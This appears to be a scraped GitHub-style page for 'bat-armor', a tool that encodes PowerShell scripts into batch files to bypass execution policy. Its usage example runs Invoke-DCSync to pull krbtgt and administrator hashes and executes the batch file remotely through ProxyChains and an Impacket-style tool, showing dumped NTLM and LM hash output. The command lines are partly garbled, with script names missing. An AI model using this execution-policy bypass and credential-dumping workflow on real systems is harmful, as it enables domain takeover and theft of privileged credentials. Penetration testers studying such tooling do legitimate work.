by klsecservices

klsecservices / bat-armor

Encode powershell payload into bat files

128 Stars 46 Forks Last release: Not found MIT License 5 Commits 0 Releases

Available items

No Items, yet!

The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:

Bat Armor

Bypass PowerShell execution policy by encoding ps script into bat file.


Run Invoke-DCSync.ps1 to get krbtgt hash:

$ python --script-path Invoke-DCSync.ps1\
--launch-string "Invoke-DCSync -users krbtgt,administrator -alldata"\
--out krbtgt.bat --target-filepath 'c:\windows\krbtgt.bat'

$ python pentesto.loc/[email protected] -c krbtgt.bat
ProxyChains-3.1 (
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies


Hash NTLM: b8aa706788a3d8c6ac9a96684d7ff330
ntlm- 0: b8aa706788a3d8c6ac9a96684d7ff330
lm - 0: 6829621ea2044b0e931f83e0b62b4b8c

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.